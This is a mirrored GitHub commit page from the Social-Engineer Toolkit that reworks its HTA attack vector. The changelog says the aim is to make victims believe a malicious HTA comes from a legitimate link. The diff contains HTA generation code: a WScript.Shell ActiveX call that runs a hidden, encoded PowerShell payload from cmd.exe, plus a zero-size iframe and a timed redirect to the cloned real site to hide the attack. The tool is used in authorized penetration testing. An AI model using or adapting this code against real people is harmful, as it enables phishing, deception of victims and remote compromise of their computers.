mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2025-04-04 14:56:08 +00:00
Updated HTA to be a more believable attack vector
This commit is contained in:
TrustedSec
parent
49194ee9bb
commit
3c65ccf294
4 changed files with 65 additions and 17 deletions
|
|
@ -7,6 +7,9 @@ version 7.0
|
|||
* updated config option to use most recent user agent string
|
||||
* massive re-haul for pep8
|
||||
* massive re-haul for python3
|
||||
* added more words to mssql wordlist
|
||||
* major refactoring of python codebase to support both python2 and python3
|
||||
* restructured HTA attack vector and improved codebase to redirect after 3 seconds to the legitimate website while still launching the HTA file, this makes it very easy to coax victim into beleiving the HTA they are running is from a legitimate link
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 6.5.9
|
||||
|
|
|
|||
|
|
@ -172,15 +172,9 @@ try:
|
|||
###############################################################
|
||||
# HTA ATTACK VECTOR METHOD HERE
|
||||
###############################################################
|
||||
if attack_vector == '8':
|
||||
from src.webattack.hta.main import *
|
||||
# update config
|
||||
update_options("ATTACK_VECTOR=HTA")
|
||||
gen_hta_cool_stuff()
|
||||
attack_vector = "hta"
|
||||
print_status("Automatically starting Apache for you...")
|
||||
subprocess.Popen("service apache2 start",
|
||||
shell=True).wait()
|
||||
#if attack_vector == '8':
|
||||
# assign HTA attack vector - do more later
|
||||
# attack_vector = "hta"
|
||||
|
||||
# Removed to delete MLITM
|
||||
if attack_vector != "99999":
|
||||
|
|
@ -208,8 +202,6 @@ try:
|
|||
|
||||
try:
|
||||
# write our attack vector to file to be called later
|
||||
# print definepath()
|
||||
# os.chdir(definepath)
|
||||
filewrite = open(setdir + "/attack_vector", "w")
|
||||
|
||||
# webjacking and web templates are not allowed
|
||||
|
|
@ -237,6 +229,7 @@ try:
|
|||
# if attack vector is default or 1 for java applet
|
||||
if attack_vector == '':
|
||||
attack_vector = '1'
|
||||
|
||||
# specify java applet attack
|
||||
if attack_vector == '1':
|
||||
attack_vector = "java"
|
||||
|
|
@ -282,6 +275,13 @@ try:
|
|||
filewrite.write(attack_vector)
|
||||
filewrite.close()
|
||||
|
||||
# hta attack vector
|
||||
if attack_vector == '8':
|
||||
# call hta attack vector
|
||||
attack_vector = "hta"
|
||||
filewrite.write(attack_vector)
|
||||
filewrite.close()
|
||||
|
||||
# pull ip address
|
||||
if choice3 != "-1":
|
||||
fileopen = open(
|
||||
|
|
@ -375,7 +375,7 @@ try:
|
|||
setprompt(["2"], "IP address for the POST back in Harvester/Tabnabbing"))
|
||||
if check_options("IPADDR=") != 0:
|
||||
ipaddr = check_options("IPADDR=")
|
||||
update_options("IPADDR=" + ipaddr)
|
||||
update_options("IPADDR=" + ipaddr)
|
||||
|
||||
# if java applet attack
|
||||
if attack_vector == "java":
|
||||
|
|
@ -471,6 +471,17 @@ try:
|
|||
from src.webattack.profiler.webprofiler import *
|
||||
prep_website()
|
||||
|
||||
# launch HTA attack vector after the website has been cloned
|
||||
if attack_vector == "hta":
|
||||
# launch HTA attack vector after the website has been cloned
|
||||
from src.webattack.hta.main import *
|
||||
# update config
|
||||
update_options("ATTACK_VECTOR=HTA")
|
||||
gen_hta_cool_stuff()
|
||||
attack_vector = "hta"
|
||||
print_status("Automatically starting Apache for you...")
|
||||
subprocess.Popen("service apache2 start",shell=True).wait()
|
||||
|
||||
if attack_vector != "harvester":
|
||||
if attack_vector != "tabnabbing":
|
||||
if attack_vector != "multiattack":
|
||||
|
|
@ -500,8 +511,8 @@ try:
|
|||
# Create a website clone
|
||||
if choice3 == '2':
|
||||
# flag that we want a custom website
|
||||
sys.path.append(
|
||||
definepath + "/src/webattack/web_clone/")
|
||||
definepath = os.getcwd()
|
||||
sys.path.append(definepath + "/src/webattack/web_clone/")
|
||||
if os.path.isfile(setdir + "/site.template"):
|
||||
os.remove(setdir + "/site.template")
|
||||
filewrite = open(setdir + "/site.template", "w")
|
||||
|
|
@ -528,6 +539,17 @@ try:
|
|||
filewrite.write("\nURL=%s" % (URL))
|
||||
filewrite.close()
|
||||
|
||||
# launch HTA attack vector after the website has been cloned
|
||||
if attack_vector == "hta":
|
||||
# launch HTA attack vector after the website has been cloned
|
||||
from src.webattack.hta.main import *
|
||||
# update config
|
||||
update_options("ATTACK_VECTOR=HTA")
|
||||
gen_hta_cool_stuff()
|
||||
attack_vector = "hta"
|
||||
print_status("Automatically starting Apache for you...")
|
||||
subprocess.Popen("service apache2 start",shell=True).wait()
|
||||
|
||||
# grab browser exploit selection
|
||||
if attack_vector == "browser":
|
||||
# grab clientattack
|
||||
|
|
@ -569,6 +591,7 @@ try:
|
|||
import src.core.payloadgen.create_payloads
|
||||
|
||||
# arp cache if applicable
|
||||
definepath = os.getcwd()
|
||||
sys.path.append(definepath + "/src/core/arp_cache")
|
||||
debug_msg(
|
||||
me, "line 500: importing 'src.core.arp_cache.arp'", 1)
|
||||
|
|
@ -695,6 +718,17 @@ try:
|
|||
me, "importing 'src.webattack.web_clone.cloner'", 1)
|
||||
import src.webattack.web_clone.cloner
|
||||
|
||||
# launch HTA attack vector after the website has been cloned
|
||||
if attack_vector == "hta":
|
||||
# launch HTA attack vector after the website has been cloned
|
||||
from src.webattack.hta.main import *
|
||||
# update config
|
||||
update_options("ATTACK_VECTOR=HTA")
|
||||
gen_hta_cool_stuff()
|
||||
attack_vector = "hta"
|
||||
print_status("Automatically starting Apache for you...")
|
||||
subprocess.Popen("service apache2 start",shell=True).wait()
|
||||
|
||||
# if java applet attack
|
||||
if attack_vector == "java":
|
||||
# import our payload generator
|
||||
|
|
|
|||
|
|
@ -1917,3 +1917,13 @@ def module_reload(module):
|
|||
|
||||
def input(string):
|
||||
return raw_input(string)
|
||||
|
||||
# fetch URL needed for web cloning
|
||||
def fetch_template():
|
||||
fileopen = open(setdir + "/site.template").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("URL=", line)
|
||||
if match:
|
||||
line = line.split("=")
|
||||
return line[1]
|
||||
|
|
|
|||
|
|
@ -6,7 +6,6 @@
|
|||
######################################################
|
||||
from src.core.setcore import *
|
||||
|
||||
|
||||
def gen_hta_cool_stuff():
|
||||
print_status(
|
||||
"HTA Attack Vector selected. Enter your IP, Port, and Payload...")
|
||||
|
|
@ -37,8 +36,10 @@ def gen_hta_cool_stuff():
|
|||
command = "powershell -window hidden -enc " + ps
|
||||
# hta code here
|
||||
print_status("Embedding HTA attack vector and PowerShell injection...")
|
||||
main1 = """<script>\na=new ActiveXObject("WScript.Shell");\na.run('%%windir%%\\\\System32\\\\cmd.exe /c %s', 0);window.close();\n</script>""" % (command)
|
||||
main2 = """<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>"""
|
||||
# grab cloned website
|
||||
url = fetch_template()
|
||||
main1 = ("""<script>\na=new ActiveXObject("WScript.Shell");\na.run('%%windir%%\\\\System32\\\\cmd.exe /c %s', 0);window.close();\n</script>""" % (command))
|
||||
main2 = ("""<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>\n<script type="text/javascript">setTimeout(function(){window.location.href="%s";}, 3000);</script>""" % url)
|
||||
|
||||
# metasploit answer file here
|
||||
filewrite = open(setdir + "/meta_config", "w")
|
||||
|
|
|
|||
Loading…
Add table
Reference in a new issue